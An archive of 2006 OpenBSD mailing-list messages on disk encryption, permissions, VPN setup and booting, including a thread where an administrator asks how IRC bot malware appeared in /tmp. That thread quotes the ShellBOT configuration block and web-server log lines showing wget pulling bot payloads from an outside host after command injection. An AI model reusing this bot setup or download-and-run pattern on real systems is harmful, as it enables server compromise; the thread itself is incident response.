Re: CGD
On 02/04/2006 01:05:17 AM, veins wrote: I think you are missing the point, cgd and salting are two different and unrelated things. It's not because cgd isn't making it into OpenBSD, that salting won't make it into svnd. I'd explain, but frankly after a night at work i'd rather go and sleep while you google :-) I know cgd and salting are two different things, but cgd salts and svnd does not. IMO, what the thread is about is the criticisms that came up of svnd, compared with the goodness of CGD, in the interview about CGD. So, people are suddenly wanting CGD... Or maybe I am OT, it is late. :) The svnd salting patch did come up in the CGD thread, which sorta changed the subject to whether or not svnd _should_ salt. ps. tedu just said that he got no comments about his diff, if you really think the idea is valuable, you should be testing the diff. You are right. But another point of my post was to indicate that yes, tedu is right in that most people _won't_ run CGD (or svnd) but people _still_ appreciate having the option open. I, like IMO a lot of people, have only enough interest to kibbutz in the hope of slowly collecting enough information to make an informed choice should the time come to exercise the option. The only apology I make regards this aspect of my post is cluttering up the list in the hopes that what I say will make the people actually doing the work feel appreciated rather than put-upon, by pointing out that the clueless questions are an indication of the large breadth (but not depth) of desire for a crypto fs. It seems tough working on something complex a whole lot of people sorta think they want a little bit. Crypto fs seems to fit that bill more than most. So in way of support I thought I'd try to point this out and give encouragement. Again, sorry if it's a distraction. Regardless, thanks for hitting me with a clue-stick even if I did not need it, because sometimes I do. :-) Karl [EMAIL PROTECTED] Free Software: You don't pay back, you pay forward. -- Robert A. Heinlein
Re: DadOS - sys shutdown with XDM
On Wednesday 04 January 2006 02:36, Otto Moerbeek wrote: On Tue, 3 Jan 2006, Dave Feustel wrote: On Tuesday 03 January 2006 17:50, Otto Moerbeek wrote: On Tue, 3 Jan 2006, Dave Feustel wrote: On Tuesday 03 January 2006 17:11, J.C. Roberts wrote: The rule of thumb for granting privileges is simple; avoid granting permissions whenever possible. Check the ownership/privileges on /tmp/.X11-unix/X0 after you start kde or Xorg. Come on, this is a unix domain socket, as has been pointed out before. You keep on repeating this nonsense. Having a world writable socket is not a problem in itself. X has it's own authentication/authorization scheme, which is used both for unix domain sockets and tcp sockets. I confess that I do not understand the ramifications of the world rw+suid permissions on this socket. I do wonder why this socket has world rw when it seems to work equally well after I do a chmod 4700 on it at the beginning of every kde session. Do not the permissions applied to this socket violate the principle of least privilege mentioned above? It does not have suid permissions. This clearly shows you understand little about permissions. Hint: it's a socket, starting with an 's'. The princpiple is not violated, because having the socket writable for others has it's uses, maybe? -Otto Otto, I reread the man page for ls and I did indeed misread the documentation as to what the 's' means here. Thanks for pointing that out. 50 srwxrwxrwx1 daf wheel 0 Jan 4 05:01 /tmp/.X11-unix/X0 80 srwx--1 daf wheel 0 Jan 4 05:01 /tmp/.ICE-unix/dcop15166-1136368903 90 srwx--1 daf wheel 0 Jan 4 05:01 /tmp/.ICE-unix/389 -- Lose, v., experience a loss, get rid of, lose the weight Loose, adj., not tight, let go, free, loose clothing
Re: CGD
On 1/4/06, Ted Unangst [EMAIL PROTECTED] wrote: On 1/3/06, knitti [EMAIL PROTECTED] wrote: cgd gives users some choice over how to build their encrypted partition. you're able to use different ciphers. in the unlikely case of a cipher getting broken, you have the possibility to switch instantly, using a tool you know with stable code an the same way you configured it. this is really not that useful. why would you pick anything other than the best when setting it up? because no one knows what the best is. blowfish appears to be the best at the moment, because its secure and fast. some other people don't like block sizes of 64 bit. so perhaps they take aes, which is slightly slower but encrypts blocks of 128 bit. is it for no reason, that swap encryption uses aes over blowfish? and after it's setup, you can't change. the idea that once a cipher is broken you could migrate is nice, but think about it. are you equipping all your servers with double storage so that you can copy and reencrypt everything? i doubt anyone has thougt more than 10 seconds about what the migration procedure would really be. a pain in the ass. but you can plan for it. anyway, it's not that hard to switch ciphers in svnd. how critical is your timeframe? can you wait 24 hours to upgrade? no one besides you (the developers) knows, how quick an upgrade would be possible. 24h _is_ really fast, and a week would probably suffice too, for most people. I think this rocks, but no one knew it would be that fast. you're able to change your passphrase without reencrypting your container. not really, or at least not any more so than with svnd. encrypting with your passphrase (as would be the easy way with svnd) is using a weaker keyspace than encrypting with a generated key. but you are right, that would be possible with svnd too. --knitti
Re: upgrading packages with pkg_add -u and pkg_add -r
On 1/3/06, Justin H Haynes [EMAIL PROTECTED] wrote: I really appreciate this work. Until it is complete, here are a few quick and dirty things I do to make the upgrade process a little easier. Probably common sense to many, but I'll share it all the same: https://justinhaynes.com/weblog/package-updates-in-openbsd-38/ -Justin This is good, but you should substitute: uname -a | awk '{print $3}' for uname -r and uname -a | awk '{print $5}' for uname -m
Re: learning to code - suggestions needed
Edd Barrett wrote: I'm taking a university degree that teaches unix system programming in solaris in the second year. FWIW, here we scratch the surface too... But I was glad I read the knf manpage and some code reviews on this list. The c.l.c FAQ was also a very good resource. On a tangent, comp.risks and Bruce Shneier should be required reading for anyone who's programming. It's less expensive to learn through other's mistakes. So I guess this tells you to expect to do some learning on your own by using these and other's resources. I no longer think I could be competent just by going to school. -- Luis disenchanted with school Bruno
Re: CGD
this is really not that useful. why would you pick anything other than the best when setting it up? because no one knows what the best is. blowfish appears to be the best at the moment, because its secure and fast. some other people don't like block sizes of 64 bit. so perhaps they take aes, which is slightly slower but encrypts blocks of 128 bit. is it for no reason, that swap encryption uses aes over blowfish? If you really meant what you said you should let the people that write an OS make that decision for you. And just for everyone's entertainment, when was it the last time that you saw swap being used?
How did they get here?
To begin, I'm running OpenBSD trim.chrispyfur.net 3.6 GENERIC.MP#173 i386. I have some suspect files in /tmp, and I'm fairly sure that they shouldn't be there. Only thing I can't twig is what method the attackers used to get the files into that directory. The files are: ### Microsoft Search Worm - by br0k3d ### # From the same author of LinuxDay Worm and other variants ### And: # ShellBOT # 0ldW0lf - [EMAIL PROTECTED] # - www.atrix-br.cjb.net # - www.atrix.cjb.net in /tmp/.cpanel and /tmp/.cpanel.tmp. Reading them through, they just look like IRC clients written in Perl that have some remote commands for DOS, and the likes. They connect to a chatroom and print some message or other. If anybody wants to have some fun, the main config block is: # IRC my @adms=(darkwoot, br0k3d, vipzen, Nandokabala); #nick dos administradores my @canais=(#gestapo); my $nick='ADOLFHITLER'; # nick do bot.. c o nick jah estiveh em uso.. vai aparece com um numero radonamico no final my $ircname = 'SSSA'; chop (my $realname = `uname -a`); $servidor='irc.agitamanaus.net' unless $servidor; #servidor d irc q vai c usadu c naum for especificado no argumento my $porta='6667'; #porta do servidor d irc My question is how did these files get into the machine. I have entries in the httpd error log that look like this: --05:10:47-- http://arnold.dvclub.com.hk/phpBB2/linuxday.txt = `/tmp/.cpanel' Resolving arnold.dvclub.com.hk... done. Connecting to arnold.dvclub.com.hk[202.61.102.4]:80... connected. HTTP request sent, awaiting response... --05:10:57-- http:// arnold.dvclub.com.hk/phpBB2/linuxdaybot.txt = `/tmp/.cpanel.tmp' Resolving arnold.dvclub.com.hk... done. Connecting to arnold.dvclub.com.hk[202.61.102.4]:80... failed: Connection timed out. Retrying. --05:12:13-- http://arnold.dvclub.com.hk/phpBB2/linuxdaybot.txt (try: 2) = `/tmp/.cpanel.tmp' Connecting to arnold.dvclub.com.hk[202.61.102.4]:80... 200 OK Length: 3,355 [text/plain] 0K ... 100% 468.05 KB/s 05:12:27 (468.05 KB/s) - `/tmp/.cpanel' saved [3355/3355] So something is clearly injecting a command into a script, and it is causing wget to run and fetch some files. There are more instances of the same thing, but they're all fetching a file from the same place (either .cpanel, .cpanel.tmp or .plesk). Because they're in the default Apache error log, the attacker must have hit a website on the machine that doesn't have an ErrorLog defined, or they hit the machine by IP instead of a hostname. I got a list of sites that have no error log (and would log to /var/www/ logs/error_log) and checked their transfer logs. None of them had any entries in them that correspond to any of the times on the wget entries, so I learn nothing from this. There are earlier entries as well, doing the same thing, but to a different site I'm going to do a bulk grep on all the web server logs to see if anything about wget turns up in any of them, and if I can then work out which script on which site is causing the problem. As far as I can tell, there is no damage, but there are some entries like these in the error logs: /tmp/x44423[1]: ^?ELF^A^A^ALinux^B^C^A8080^44: not found /tmp/x44423[2]: 1?X89?8DT81^DP83??RQ??^A?: not found /tmp/x44423[4]: syntax error: `(' unexpected Am I right in thinking that these entries show somebody trying to run a Linux binary unsuccessfully? Good job I leave Linux emulation turned off... :) So, what's my next move? My daily/weekly security emails show nothing to be worried about, no changes to any system critical files or anything of that ilk. Where can I look for more information or clues? I know the machine is due for an upgrade, and that's next on my list. I would provide a dmesg but the machine has been up for a while with one full disk, so it's been pushed out of the end of the dmesg file. Gaby -- Junkets for bunterish lickspittles since 1998! http://vanhegan.net/sudoku/ http://weblog.vanhegan.net/
Re: VPN packets not passing remote gateway [RESOLVED... sorta]
On Jan 4, 2006, at 9:32 AM, Hekan Olsson wrote: On 4 jan 2006, at 05.57, Jason Dixon wrote: After some gentle persuading by Adrian Close, I dropped ipsecadm and went back to automatic key exchange with isakmpd. A quick configuration based on the east/west and all is good. Same PF configuration, no changes there except for the addition of ISAKMP traffic. Don't know what the problem was, although I'm sure it was user related. Your manual setup only included one SA (SPI 0x100a), and you always need atleast two, as an SA is unidirectional. I tried that too before moving over to ISAKMP. It was still behaving the same, but it was probably user error. Thanks, -- Jason Dixon DixonGroup Consulting http://www.dixongroup.net
Re: VPN packets not passing remote gateway [RESOLVED... sorta]
Jason Dixon wrote: On Jan 4, 2006, at 9:32 AM, Hekan Olsson wrote: On 4 jan 2006, at 05.57, Jason Dixon wrote: After some gentle persuading by Adrian Close, I dropped ipsecadm and went back to automatic key exchange with isakmpd. A quick configuration based on the east/west and all is good. Same PF configuration, no changes there except for the addition of ISAKMP traffic. Don't know what the problem was, although I'm sure it was user related. Your manual setup only included one SA (SPI 0x100a), and you always need atleast two, as an SA is unidirectional. I tried that too before moving over to ISAKMP. It was still behaving the same, but it was probably user error. Thanks, -- Jason Dixon DixonGroup Consulting http://www.dixongroup.net Here is the most simple manual keying setup I could make: I can create a manually keyed host to host vpn with two lines in /etc/ipsec.conf On the other host, just make sure to swap the IPs, spi numbers and the auth and enc keys. They key values are for testing only. flow esp from 192.168.71.129 to 192.168.71.128 esp from 192.168.71.129 to 192.168.71.128 spi 0x1000:0x1001 authkey 0x:0x0001 enckey 0x:0x0001
Re: How did they get here?
Looks like you've made some new friends in Manaus, Brazil :-) -p. On Wed, Jan 04, 2006 at 02:50:01PM +, Gaby vanhegan wrote: To begin, I'm running OpenBSD trim.chrispyfur.net 3.6 GENERIC.MP#173 i386. I have some suspect files in /tmp, and I'm fairly sure that they shouldn't be there. Only thing I can't twig is what method the attackers used to get the files into that directory. The files are: ### Microsoft Search Worm - by br0k3d ### # From the same author of LinuxDay Worm and other variants ### And: # ShellBOT # 0ldW0lf - [EMAIL PROTECTED] # - www.atrix-br.cjb.net # - www.atrix.cjb.net in /tmp/.cpanel and /tmp/.cpanel.tmp. Reading them through, they just look like IRC clients written in Perl that have some remote commands for DOS, and the likes. They connect to a chatroom and print some message or other. If anybody wants to have some fun, the main config block is: # IRC my @adms=(darkwoot, br0k3d, vipzen, Nandokabala); #nick dos administradores my @canais=(#gestapo); my $nick='ADOLFHITLER'; # nick do bot.. c o nick jah estiveh em uso.. vai aparece com um numero radonamico no final my $ircname = 'SSSA'; chop (my $realname = `uname -a`); $servidor='irc.agitamanaus.net' unless $servidor; #servidor d irc q vai c usadu c naum for especificado no argumento my $porta='6667'; #porta do servidor d irc My question is how did these files get into the machine. I have entries in the httpd error log that look like this: --05:10:47-- http://arnold.dvclub.com.hk/phpBB2/linuxday.txt = `/tmp/.cpanel' Resolving arnold.dvclub.com.hk... done. Connecting to arnold.dvclub.com.hk[202.61.102.4]:80... connected. HTTP request sent, awaiting response... --05:10:57-- http:// arnold.dvclub.com.hk/phpBB2/linuxdaybot.txt = `/tmp/.cpanel.tmp' Resolving arnold.dvclub.com.hk... done. Connecting to arnold.dvclub.com.hk[202.61.102.4]:80... failed: Connection timed out. Retrying. --05:12:13-- http://arnold.dvclub.com.hk/phpBB2/linuxdaybot.txt (try: 2) = `/tmp/.cpanel.tmp' Connecting to arnold.dvclub.com.hk[202.61.102.4]:80... 200 OK Length: 3,355 [text/plain] 0K ... 100% 468.05 KB/s 05:12:27 (468.05 KB/s) - `/tmp/.cpanel' saved [3355/3355] So something is clearly injecting a command into a script, and it is causing wget to run and fetch some files. There are more instances of the same thing, but they're all fetching a file from the same place (either .cpanel, .cpanel.tmp or .plesk). Because they're in the default Apache error log, the attacker must have hit a website on the machine that doesn't have an ErrorLog defined, or they hit the machine by IP instead of a hostname. I got a list of sites that have no error log (and would log to /var/www/ logs/error_log) and checked their transfer logs. None of them had any entries in them that correspond to any of the times on the wget entries, so I learn nothing from this. There are earlier entries as well, doing the same thing, but to a different site I'm going to do a bulk grep on all the web server logs to see if anything about wget turns up in any of them, and if I can then work out which script on which site is causing the problem. As far as I can tell, there is no damage, but there are some entries like these in the error logs: /tmp/x44423[1]: ^?ELF^A^A^ALinux^B^C^A8080^44: not found /tmp/x44423[2]: 1?X89?8DT81^DP83??RQ??^A?: not found /tmp/x44423[4]: syntax error: `(' unexpected Am I right in thinking that these entries show somebody trying to run a Linux binary unsuccessfully? Good job I leave Linux emulation turned off... :) So, what's my next move? My daily/weekly security emails show nothing to be worried about, no changes to any system critical files or anything of that ilk. Where can I look for more information or clues? I know the machine is due for an upgrade, and that's next on my list. I would provide a dmesg but the machine has been up for a while with one full disk, so it's been pushed out of the end of the dmesg file. Gaby -- Junkets for bunterish lickspittles since 1998! http://vanhegan.net/sudoku/ http://weblog.vanhegan.net/
Re: CGD
On 1/4/06, Marco Peereboom [EMAIL PROTECTED] wrote: because no one knows what the best is. blowfish appears to be the best at the moment, because its secure and fast. some other people don't like block sizes of 64 bit. so perhaps they take aes, which is slightly slower but encrypts blocks of 128 bit. is it for no reason, that swap encryption uses aes over blowfish? If you really meant what you said you should let the people that write an OS make that decision for you. apparently there is no such thing as a general best, only an application specific. or do you suggest there is one? why would the developers then decide to use blowfish for svnd and aes for swap? as it looks, data in swap is more secure than on svnd. known plaintext attacks are far more difficult, and no problem with replay attacks. why shouldn't I be able to have this also for storage? if that's the decision by the developers, I'd rather decide on my own. And just for everyone's entertainment, when was it the last time that you saw swap being used? last year. five days ago. --knitti
Re: How did they get here?
Hi, Standard advise is to reinstall the o/s (3.8 ? ;-) and then _data_ only from know good backup. You could use a boot cdrom dd off an image of the disk for later analysis if you want first. Is there some attack vector like php or such available on the machine ? maybe they used that to retrieve write the file ? ... but access to /tmp is tricky from a chrooted httpd ! /Pete On 4. jan. 2006, at 15.50, Gaby vanhegan wrote: To begin, I'm running OpenBSD trim.chrispyfur.net 3.6 GENERIC.MP#173 i386. I have some suspect files in /tmp, and I'm fairly sure that they shouldn't be there. Only thing I can't twig is what method the attackers used to get the files into that directory. The files are: ### Microsoft Search Worm - by br0k3d ### # From the same author of LinuxDay Worm and other variants ### And: # ShellBOT # 0ldW0lf - [EMAIL PROTECTED] # - www.atrix-br.cjb.net # - www.atrix.cjb.net in /tmp/.cpanel and /tmp/.cpanel.tmp. Reading them through, they just look like IRC clients written in Perl that have some remote commands for DOS, and the likes. They connect to a chatroom and print some message or other. If anybody wants to have some fun, the main config block is: # IRC my @adms=(darkwoot, br0k3d, vipzen, Nandokabala); #nick dos administradores my @canais=(#gestapo); my $nick='ADOLFHITLER'; # nick do bot.. c o nick jah estiveh em uso.. vai aparece com um numero radonamico no final my $ircname = 'SSSA'; chop (my $realname = `uname -a`); $servidor='irc.agitamanaus.net' unless $servidor; #servidor d irc q vai c usadu c naum for especificado no argumento my $porta='6667'; #porta do servidor d irc My question is how did these files get into the machine. I have entries in the httpd error log that look like this: --05:10:47-- http://arnold.dvclub.com.hk/phpBB2/linuxday.txt = `/tmp/.cpanel' Resolving arnold.dvclub.com.hk... done. Connecting to arnold.dvclub.com.hk[202.61.102.4]:80... connected. HTTP request sent, awaiting response... --05:10:57-- http:// arnold.dvclub.com.hk/phpBB2/linuxdaybot.txt = `/tmp/.cpanel.tmp' Resolving arnold.dvclub.com.hk... done. Connecting to arnold.dvclub.com.hk[202.61.102.4]:80... failed: Connection timed out. Retrying. --05:12:13-- http://arnold.dvclub.com.hk/phpBB2/linuxdaybot.txt (try: 2) = `/tmp/.cpanel.tmp' Connecting to arnold.dvclub.com.hk[202.61.102.4]:80... 200 OK Length: 3,355 [text/plain] 0K ... 100% 468.05 KB/s 05:12:27 (468.05 KB/s) - `/tmp/.cpanel' saved [3355/3355] So something is clearly injecting a command into a script, and it is causing wget to run and fetch some files. There are more instances of the same thing, but they're all fetching a file from the same place (either .cpanel, .cpanel.tmp or .plesk). Because they're in the default Apache error log, the attacker must have hit a website on the machine that doesn't have an ErrorLog defined, or they hit the machine by IP instead of a hostname. I got a list of sites that have no error log (and would log to /var/www/ logs/error_log) and checked their transfer logs. None of them had any entries in them that correspond to any of the times on the wget entries, so I learn nothing from this. There are earlier entries as well, doing the same thing, but to a different site I'm going to do a bulk grep on all the web server logs to see if anything about wget turns up in any of them, and if I can then work out which script on which site is causing the problem. As far as I can tell, there is no damage, but there are some entries like these in the error logs: /tmp/x44423[1]: ^?ELF^A^A^ALinux^B^C^A8080^44: not found /tmp/x44423[2]: 1?X89?8DT81^DP83??RQ??^A?: not found /tmp/x44423[4]: syntax error: `(' unexpected Am I right in thinking that these entries show somebody trying to run a Linux binary unsuccessfully? Good job I leave Linux emulation turned off... :) So, what's my next move? My daily/weekly security emails show nothing to be worried about, no changes to any system critical files or anything of that ilk. Where can I look for more information or clues? I know the machine is due for an upgrade, and that's next on my list. I would provide a dmesg but the machine has been up for a while with one full disk, so it's been pushed out of the end of the dmesg file. Gaby -- Junkets for bunterish lickspittles since 1998! http://vanhegan.net/sudoku/ http://weblog.vanhegan.net/
Re: How did they get here?
On Wed, 2006-01-04 at 14:50:01 +, Gaby vanhegan proclaimed... To begin, I'm running OpenBSD trim.chrispyfur.net 3.6 GENERIC.MP#173 i386. I have some suspect files in /tmp, and I'm fairly sure that they shouldn't be there. Only thing I can't twig is what method the attackers used to get the files into that directory. The files are: Is this doing any A/V scanning? You have told us nothign about the host in question: is it an email gateway? DNS server? etc.
Re: How did they get here?
On 4 Jan 2006, at 15:51, Pete Vickers wrote: Standard advise is to reinstall the o/s (3.8 ? ;-) and then _data_ only from know good backup. You could use a boot cdrom dd off an image of the disk for later analysis if you want first. It seems that the files have been uploaded, but they haven't actually caused any damage, or even been run. Unfortunately, I don't have the resources to mount a full investigation. Grep'ing every httpd log on the machine has produced no more information, but the fact that the actual wget output was in the httpd logs leads me to think that was the way in. Is there some attack vector like php or such available on the machine ? maybe they used that to retrieve write the file? The messages in the log file indicate that they used some command injection in a script to call wget and download the files into /tmp. I'm fairly sure it was via a bad script, and I'm trying to locate which script was used, so far with no success. ... but access to /tmp is tricky from a chrooted httpd ! Legacy sites mean that we haven't tried to chroot apache yet. I think it's probably time to bite the bullet and get this done :) Gaby -- Junkets for bunterish lickspittles since 1998! http://vanhegan.net/sudoku/ http://weblog.vanhegan.net/
Re: How did they get here?
On 4 Jan 2006, at 16:05, eric wrote: I have some suspect files in /tmp, and I'm fairly sure that they shouldn't be there. Only thing I can't twig is what method the attackers used to get the files into that directory. The files are: Is this doing any A/V scanning? You have told us nothign about the host in question: is it an email gateway? DNS server? etc. It runs: - qmail/spamassassin-spamd/openbsd-spamd/rblsmtpd - stock apache/php 4.3.8 It does no AV scanning above and beyond what SpamAssassin provides. It does not run any DNS services. I outlined my reasons why I thought it was a php/cgi script problem, being that the messages were found in the default httpd error logs. Finally, here is a dmesg (thanks Josh :-) OpenBSD 3.6 (GENERIC.MP) #173: Fri Sep 17 12:52:31 MDT 2004 [EMAIL PROTECTED]:/usr/src/sys/arch/i386/compile/GENERIC.MP cpu0: Intel Pentium III (GenuineIntel 686-class) 601 MHz cpu0: FPU,V86,DE,PSE,TSC,MSR,PAE,MCE,CX8,APIC,SEP,MTRR,PGE,MCA,CMOV,PAT,PSE36, MMX,FXSR,SSE real mem = 1073324032 (1048168K) avail mem = 972726272 (949928K) using 4278 buffers containing 53768192 bytes (52508K) of memory mainbus0 (root) bios0 at mainbus0: AT/286+(00) BIOS, date 07/15/99, BIOS32 rev. 0 @ 0xfdb50 apm0 at bios0: Power Management spec V1.2 apm0: AC on, battery charge unknown pcibios0 at bios0: rev 2.1 @ 0xf/0x1 pcibios0: PCI BIOS has 8 Interrupt Routing table entries pcibios0: PCI Interrupt Router at 000:07:0 (Intel 82371AB PIIX4 ISA rev 0x00) pcibios0: PCI bus #1 is the last bus bios0: ROM list: 0xc/0x8000 mainbus0: Intel MP Specification (Version 1.1) (INTEL440GX ) cpu0 at mainbus0: apid 0 (boot processor) cpu0: apic clock running at 100 MHz cpu1 at mainbus0: apid 1 (application processor) cpu1: Intel Pentium III (GenuineIntel 686-class) 601 MHz cpu1: FPU,V86,DE,PSE,TSC,MSR,PAE,MCE,CX8,APIC,SEP,MTRR,PGE,MCA,CMOV,PAT,PSE36, SER,MMX,FXSR,SSE mainbus0: bus 0 is type PCI mainbus0: bus 1 is type PCI mainbus0: bus 2 is type ISA ioapic0 at mainbus0: apid 2 pa 0xfec0, version 11, 24 pins pci0 at mainbus0 bus 0: configuration mode 1 (no bios) pchb0 at pci0 dev 0 function 0 Intel 82443BX AGP rev 0x03 ppb0 at pci0 dev 1 function 0 Intel 82443BX AGP rev 0x03 pci1 at ppb0 bus 1 pcib0 at pci0 dev 7 function 0 Intel 82371AB PIIX4 ISA rev 0x02 pciide0 at pci0 dev 7 function 1 Intel 82371AB IDE rev 0x01: DMA, channel 0 wired to compatibility, channel 1 wired to compatibility wd0 at pciide0 channel 0 drive 0: ST380011A wd0: 16-sector PIO, LBA48, 76319MB, 156301488 sectors wd1 at pciide0 channel 0 drive 1: IBM-DPTA-372050 wd1: 16-sector PIO, LBA, 19574MB, 40088160 sectors wd0(pciide0:0:0): using PIO mode 4, Ultra-DMA mode 2 wd1(pciide0:0:1): using PIO mode 4, Ultra-DMA mode 2 pciide0: channel 1 disabled (no drives) uhci0 at pci0 dev 7 function 2 Intel 82371AB USB rev 0x01: apic 2 int 19 (irq 11) usb0 at uhci0: USB revision 1.0 uhub0 at usb0 uhub0: Intel UHCI root hub, class 9/0, rev 1.00/1.00, addr 1 uhub0: 2 ports with 2 removable, self powered Intel 82371AB Power Mgmt rev 0x02 at pci0 dev 7 function 3 not configured vga1 at pci0 dev 17 function 0 ATI Mach64 GP rev 0x5c wsdisplay0 at vga1: console (80x25, vt100 emulation) wsdisplay0: screen 1-5 added (80x25, vt100 emulation) xl0 at pci0 dev 18 function 0 3Com 3c905B 100Base-TX rev 0x30: apic 2 int 18 (irq 9), address 00:50:04:6a:2f:19 exphy0 at xl0 phy 24: 3Com internal media interface isa0 at pcib0 isadma0 at isa0 pckbc0 at isa0 port 0x60/5 pckbd0 at pckbc0 (kbd slot) pckbc0: using irq 1 for kbd slot wskbd0 at pckbd0: console keyboard, using wsdisplay0 pcppi0 at isa0 port 0x61 midi0 at pcppi0: PC speaker sysbeep0 at pcppi0 lpt0 at isa0 port 0x378/4 irq 7 lm0 at isa0 port 0x290/8: LM79 npx0 at isa0 port 0xf0/16: using exception 16 pccom0 at isa0 port 0x3f8/8 irq 4: ns16550a, 16 byte fifo pccom1 at isa0 port 0x2f8/8 irq 3: ns16550a, 16 byte fifo fdc0 at isa0 port 0x3f0/6 irq 6 drq 2 fd0 at fdc0 drive 0: 1.44MB 80 cyl, 2 head, 18 sec biomask 0 netmask 0 ttymask 0 pctr: 686-class user-level performance counters enabled mtrr: Pentium Pro MTRR support dkcsum: wd0 matched BIOS disk 80 dkcsum: wd1 matched BIOS disk 81 root on wd0a rootdev=0x0 rrootdev=0x300 rawdev=0x302 WARNING: / was not properly unmounted apm0: disconnected Gaby -- Junkets for bunterish lickspittles since 1998! http://vanhegan.net/sudoku/ http://weblog.vanhegan.net/
Re: learning to code - suggestions needed
Kim Onnel wrote: I just dont understand what ur saying Damn, sorry about that. - FWIW means for what (little) it's worth :-) - knf is a manpage; actually, I think it's called style in section 9. - c.l.c. is an usenet group; the comp.lang.c FAQ has lots of tips and tricks which I think are very useful. And I did start with KR; a great book. Which *also* isn't required reading; my teacher actually recommended Herb's book. -- Luis Bruno
Re: How did they get here?
On Wed, Jan 04, 2006 at 04:07:21PM +, Gaby vanhegan wrote: On 4 Jan 2006, at 15:51, Pete Vickers wrote: Is there some attack vector like php or such available on the machine ? maybe they used that to retrieve write the file? The messages in the log file indicate that they used some command injection in a script to call wget and download the files into /tmp. I'm fairly sure it was via a bad script, and I'm trying to locate which script was used, so far with no success. There was a phpBB2 in one of the paths used. If you have phpBB enabled somewhere, that's a likely attack vector. Joachim
Re: How did they get here?
To begin, I'm running OpenBSD trim.chrispyfur.net 3.6 GENERIC.MP#173 i386. I have some suspect files in /tmp, and I'm fairly sure that they shouldn't be there. Only thing I can't twig is what method the attackers used to get the files into that directory. The files are: Is this doing any A/V scanning? You have told us nothign about the host in question: is it an email gateway? DNS server? etc. I'd suspect it has something more to do with an easy-to-guess password. --Bryan
Re: CGD
On 1/4/06, knitti [EMAIL PROTECTED] wrote: this is really not that useful. why would you pick anything other than the best when setting it up? because no one knows what the best is. blowfish appears to be the best at the moment, because its secure and fast. some other people don't like block sizes of 64 bit. so perhaps they take aes, which is slightly slower but encrypts blocks of 128 bit. is it for no reason, that swap encryption uses aes over blowfish? aes has faster key setup, which is important for swap but not for svnd. the cvs changelog says as much. swap encryption started out using blowfish as well.
Re: How did they get here?
On Wed, Jan 04, 2006 at 05:28:38PM +0100, Joachim Schipper wrote: There was a phpBB2 in one of the paths used. If you have phpBB enabled somewhere, that's a likely attack vector. I noticed that too. phpBB has been used for many sorts of tricks. The ISP that I work for scans for it and support follow a prodecure to warn the customer that it has been disabled. (chmod) An easy way is to change: AddType application/x-httpd-php .php to: AddType application/x-httpd-php .phtml Most php packages come with .php files, and people that use them ususlly don't have the nouse to alter all the files and links thoughout the package. Craig.
Re: CGD
On 1/4/06, Ted Unangst [EMAIL PROTECTED] wrote: aes has faster key setup, which is important for swap but not for svnd. the cvs changelog says as much. swap encryption started out using blowfish as well. i also should have pointed out that swap was converted to using rijndael, not aes, since aes did not exist at the time the conversion was made.
Re: CGD
On 1/4/06, Karl O. Pinc [EMAIL PROTECTED] wrote: another point of my post was to indicate that yes, tedu is right in that most people _won't_ run CGD (or svnd) but people _still_ appreciate having the option open. I, like IMO a lot of people, have only enough interest to kibbutz in the hope of slowly collecting enough information to make an informed choice should the time come to exercise the option. this is good idea. the first thing you need to do is identify your threat model. can you write it down? and if it starts with somebody stealing, you lose. amidst all the yammering, i think people are just assuming that encrypting their data makes it safe. but if you can't even say what the danger is, how can you know it's safe?
Re: biosboot broken?
Uwe Dippel wrote: On Mon, 02 Jan 2006 14:06:52 +0100, M. Schatzl wrote: Now that I switched to a 60G disk (cloned the other 2 partitions and the Windows bootsector, then installed OpenBSD anew from the same floppy/mirror as before), OpenBSD won't boot any more, except when I run the boot-floopy and boot explicitely with wd0a:/bsd OK, I finally found the error. This is the the partition table: Disk: wd0 geometry: 5168/240/63 [78140160 Sectors] Offset: 0 Signature: 0xAA55 Starting Ending LBA Info: #: idC H S -C H S [ start: size ] 0: 070 1 1 - 948 239 63 [ 63:14348817 ] HPFS/QNX/AUX 1: 12 7189 0 1 - 7751 239 63 [ 108697680: 8512560 ] Compaq Diag. *2: A6 949 0 1 - 7000 239 63 [14348880:91506240 ] OpenBSD 3: 000 0 0 -0 0 0 [ 0: 0 ] unused This is the layout: NTFS - OpenBSD - unused - Compaq Partitions #0 and #1 as well as the MBR were already transferred before the installation of OpenBSD (via the installer). At the disk-setup stage, I let drop myself into fdisk. Now I created the A6 partition on unused space and proceeded, the first time leaving the boot flag on #0: ^^^ The NTFS and Compaq(FAT16) partitions showed up as i and j in the disklabel-editor. I had to calculate the new offsets for my partitions myself because it always remained on the initial value (which was correct for wd0a). Installing biosboot via /usr/mdec/installboot -v /boot /usr/mdec/biosboot wd0 was of exactly no use. When I set the boot flag to #2 later on, it still didn't work. The BIOS always responded with No OS found-messages, though I could start OpenBSD then with a bootfloppy. Appearently there was no damage done to the MBR, because Windows booted without problems. the second time with setting the flag to #2: There are no partitions visible except wd0a and wd0c. Offsets cumulated themselves every a X Installing the BIOS was successful and it also booted the kernel after a reboot. In the second case it behaved as expected. Obviously, the fact of setting the active partition affects the installation. But shouldn't the flag be just meaningful on boot, to tell the BIOS where to hook in? Maybe my assumptions/expectations are wrong, but I suspected the installer only to honor the partition ID. I don't know if this is an installer bug; I'm certainly not really hellbent to reproduce it, but I could as long as I got that old disk (1 more week). So let me know. All the best, /Markus
Re: Blowfish still good enough?
On Wednesday, January 4, Andreas Bartelt wrote: In my personal opinion, I think, the weakest link is entering the password when opening a svnd device. Are there already solutions known which combine passwords (knowledge) with hardware devices (i.e. smartcards) or biometrics in order to access some secure storage? I don't own one, but don't at least a couple of newer IBM notebook models have a fingerprint reader and a TPM built in? Do you think a combination of these measures would improve overall security? Sure, if you can get me the datasheet/etc, I'll see about possibly writing a driver for the fingerprint reader. I've contacted the company that makes them, and they refused to even talk to me. Maybe you have better luck. Otherwise, it's all talk... --Toby.
Re: How did they get here?
